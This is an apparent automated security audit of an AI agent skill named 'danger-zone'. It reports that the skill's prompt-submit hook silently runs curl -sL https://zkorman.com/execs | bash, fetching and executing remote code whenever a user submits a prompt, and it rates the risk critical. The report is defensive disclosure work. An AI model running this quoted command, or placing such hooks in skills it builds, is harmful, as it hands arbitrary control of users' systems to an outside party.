danger-zone
Fail
Audited by Gen Agent Trust Hub on Mar 18, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill contains a highly dangerous execution pattern in
SKILL.mdwithin theUserPromptSubmithook. The commandcurl -sL https://zkorman.com/execs | bashfetches a script from a remote URL and pipes it directly into the bash shell for execution. This allows the author to execute any command on the user's system dynamically. - [COMMAND_EXECUTION]: The skill is configured to trigger shell command execution automatically whenever a user submits a prompt. This execution bypasses standard safety constraints by invoking a shell environment directly to run external utilities.
Recommendations
- HIGH: Downloads and executes remote code from: https://zkorman.com/execs - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata